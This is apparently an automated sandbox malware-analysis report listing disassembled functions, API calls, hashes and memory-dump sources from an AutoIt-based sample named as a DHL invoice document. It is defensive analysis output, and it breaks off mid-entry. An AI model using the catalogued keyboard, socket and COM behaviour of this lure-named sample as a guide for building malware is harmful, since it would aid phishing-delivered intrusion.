                                                                                                                          • Part of subcall function 003A0CDF: VariantClear.OLEAUT32(?), ref: 003A0D34
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                        • Opcode ID: 8746c0601a3a4665a068d7ae02ad4c6d84a5cdcb46ec15d11f38d37865dcd34b
                                                                                                                        • Instruction ID: 0df644045c66102540d143ff37577256178a5dce3525cc45c5e98cb80bb3884e
                                                                                                                        • Opcode Fuzzy Hash: 8746c0601a3a4665a068d7ae02ad4c6d84a5cdcb46ec15d11f38d37865dcd34b
                                                                                                                        • Instruction Fuzzy Hash: E4919B756083059FCB05DF28C4819AAB7E4FF89318F14882DF98A9B751DB30EE05CB82
                                                                                                                        Function 003B4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                                                                                                                          • Part of subcall function 0039000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                                                                                                                          • Part of subcall function 0039000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                                                                                                                          • Part of subcall function 0039000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 003B4C51
                                                                                                                        • _wcslen.LIBCMT ref: 003B4D59
                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 003B4DCF
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 003B4DDA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                        • Opcode ID: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                                                                                                                        • Instruction ID: 2d0893a1946bb391a3cc08195c700352a46244aaad5167382d4d9677d11f03d3
                                                                                                                        • Opcode Fuzzy Hash: cae17fc5eb6ef2b9e0a4356ff3d67c5a3483056aa6bd06b1c8d66199aa5f69d1
                                                                                                                        • Instruction Fuzzy Hash: D8910771D0021DAFDF16DFA4D891EEEB7B8BF48314F10816AE915AB251DB709A44CFA0
                                                                                                                        Function 003C20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 003C2183
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 003C21B5
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C21DD
                                                                                                                        • _wcslen.LIBCMT ref: 003C2213
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 003C224D
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 003C225B
                                                                                                                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                                                                                                                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                                                                                                                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C22E3
                                                                                                                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4196846111-0
                                                                                                                        • Opcode ID: a57cb44c9cacc2b2c2f51f044316086f7627a66df3ab44eee861d7359379679c
                                                                                                                        • Instruction ID: fa04670a1da774262168231863629c5162e7224012d9cfa02a18da1e1a34680d
                                                                                                                        • Opcode Fuzzy Hash: a57cb44c9cacc2b2c2f51f044316086f7627a66df3ab44eee861d7359379679c
                                                                                                                        • Instruction Fuzzy Hash: A5716C75A00205AFCB16EF69C885FAEB7F5EF48320F158859E816EB351DB34ED418B90
                                                                                                                        Function 0039AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 0039AEF9
                                                                                                                        • GetKeyboardState.USER32(?), ref: 0039AF0E
                                                                                                                        • SetKeyboardState.USER32(?), ref: 0039AF6F
                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0039AF9D
                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0039AFBC
                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0039AFFD
                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0039B020
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
                                                                                                                        • Instruction ID: 23c7e8563b71916482b1f8f02d03f38f79f0ae4027870af6171b6ca6929dc1e0
                                                                                                                        • Opcode Fuzzy Hash: 9cc9a9a53937adcdb695f77ca84fa6863c640e84bd90c31df2d3d25f6981ad11
                                                                                                                        • Instruction Fuzzy Hash: 5B51E4A0A04BD53DFF3743348D49BBABEE95B06304F098589E1DA858C2C3D8ACD8D791
                                                                                                                        Function 0039ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(00000000), ref: 0039AD19
                                                                                                                        • GetKeyboardState.USER32(?), ref: 0039AD2E
                                                                                                                        • SetKeyboardState.USER32(?), ref: 0039AD8F
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0039ADBB
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0039ADD8
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0039AE17
                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0039AE38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
                                                                                                                        • Instruction ID: 61bfbadbc31200cdeb335b970cb3b50f459233702c2f4e4df2bcd7f31c4cdcf4
                                                                                                                        • Opcode Fuzzy Hash: 3337f804bd5b225902d9fe8102b86692726affeb85b994d4818d98aeb82d90a1
                                                                                                                        • Instruction Fuzzy Hash: 2451F9A1904BD53DFF3783348C55B7ABED85B46300F098689E1D54A8C2D394EC94E7D2
                                                                                                                        Function 0036542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00373CD6,?,?,?,?,?,?,?,?,00365BA3,?,?,00373CD6,?,?), ref: 00365470
                                                                                                                        • __fassign.LIBCMT ref: 003654EB
                                                                                                                        • __fassign.LIBCMT ref: 00365506
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00373CD6,00000005,00000000,00000000), ref: 0036552C
                                                                                                                        • WriteFile.KERNEL32(?,00373CD6,00000000,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 0036554B
                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00365BA3,00000000,?,?,?,?,?,?,?,?,?,00365BA3,?), ref: 00365584
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
                                                                                                                        • Instruction ID: 57363828ab98470dbcc8f8342fbf873ca7d0acd6a340764332d6825521201b88
                                                                                                                        • Opcode Fuzzy Hash: 95531349c11d1163ed1ab2471164d71e6a9c6c6be0aea897c096a0b64d7d52d8
                                                                                                                        • Instruction Fuzzy Hash: CB51D7719006499FDB12CFA8D845AEEBBF9EF0A300F14816EF556E7295D730EA41CB60
                                                                                                                        Function 003C6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 003C6C33
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 003C6C4A
                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 003C6C73
                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003AAB79,00000000,00000000), ref: 003C6C98
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 003C6CC7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3688381893-2513823414
                                                                                                                        • Opcode ID: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
                                                                                                                        • Instruction ID: c1cf39746cc460a2c5bbc83addf2407af8b1f4a11d8e3a3b00dca74bd7b253bc
                                                                                                                        • Opcode Fuzzy Hash: 8343328727032a7d39ccb5a91094fa81a56ac4b151bd09c48cc604c88e8e675d
                                                                                                                        • Instruction Fuzzy Hash: F441D535A04104AFD726CF28CD5AFA97BA9EB09350F16422CF899E72E1C771ED41CB40
                                                                                                                        Function 003B10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                                                                                                                          • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B1112
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1121
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B11C9
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 003B11F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2675159561-0
                                                                                                                        • Opcode ID: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
                                                                                                                        • Instruction ID: 421ce458cd622659ae4b9b62277c96a2bf55275bbdc419495e67f1d6d85b1e93
                                                                                                                        • Opcode Fuzzy Hash: aea6b0599a42708713a10732d2d0daf7f34a1263ff94914fef52d7a78cbab8a3
                                                                                                                        • Instruction Fuzzy Hash: AD41F431600204AFDB129F18C895BEAB7EDEF45328F148059FA09DF691C770AD41CBA0
                                                                                                                        Function 0039CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                                                                                                                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0039CF45
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0039CF7F
                                                                                                                        • _wcslen.LIBCMT ref: 0039D005
                                                                                                                        • _wcslen.LIBCMT ref: 0039D01B
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0039D061
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                        • Opcode ID: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
                                                                                                                        • Instruction ID: 3e5067dad58adde2d689b9ec07a30cd6c448f047a3372c0ee08ce4558b599913
                                                                                                                        • Opcode Fuzzy Hash: e1865751142f8e0f354077c019864b77f9142ca970fa399a6a9e4401bcd38fda
                                                                                                                        • Instruction Fuzzy Hash: 894146719452199FDF13EBA4D982EDDB7B9AF08780F1110E6E509EB141EB34AA88CB50
                                                                                                                        Function 00397726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397769
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0039778F
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00397792
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 003977B0
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 003977B9
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003977DE
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 003977EC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 746afa7221fe91d52eb2d8dfed9db03743ff8a9cfcc73d64d00f1e97ae2b0324
                                                                                                                        • Instruction ID: 992593386b1421598b647c3897ad48920e74133e19bc6e0d91f92a9f684c1fcf
                                                                                                                        • Opcode Fuzzy Hash: 746afa7221fe91d52eb2d8dfed9db03743ff8a9cfcc73d64d00f1e97ae2b0324
                                                                                                                        • Instruction Fuzzy Hash: CB21A476614219AFDF12DFE9CC88CBB77ECEB09764B058025F915DB190D670EC428760
                                                                                                                        Function 003977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397842
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00397868
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0039786B
                                                                                                                        • SysAllocString.OLEAUT32 ref: 0039788C
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00397895
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 003978AF
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 003978BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 35849eb2f6f696bfb20da8bf14cf8fd88dce5bf1a7d1ef6d48560a84385848da
                                                                                                                        • Instruction ID: 7a30dbf98e9f68e905b984f348a5961cc03b3133ade18a5df7b37267447cb795
                                                                                                                        • Opcode Fuzzy Hash: 35849eb2f6f696bfb20da8bf14cf8fd88dce5bf1a7d1ef6d48560a84385848da
                                                                                                                        • Instruction Fuzzy Hash: 8221A131618204AFDF12AFA9DC8DDAA77ECFB08360B158125F915CB2A1D670EC41CB64
                                                                                                                        Function 003A04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003A04F2
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A052E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                        • Opcode ID: 6c09959c0b8c78984bf53122f0720b363d1e44d1eb9541171b9120f8843b28a1
                                                                                                                        • Instruction ID: 924e94311298f20f006d8290e0ceade1920ec93d5608ee88c284543db78a5cb5
                                                                                                                        • Opcode Fuzzy Hash: 6c09959c0b8c78984bf53122f0720b363d1e44d1eb9541171b9120f8843b28a1
                                                                                                                        • Instruction Fuzzy Hash: C121AD74904305AFCF268F69DC04A9A7BB8EF47760F204A18F8A1E62E0E7709940CF20
                                                                                                                        Function 003A05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A0601
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                        • Opcode ID: 26055a12a23f8b9dcb396ba40b76c9a9d051e44a297b115a18e991a0009b607e
                                                                                                                        • Instruction ID: 2c23718b8417d156d0247d305760a9a2b9638a28369c1aef33448ac4ee5a5238
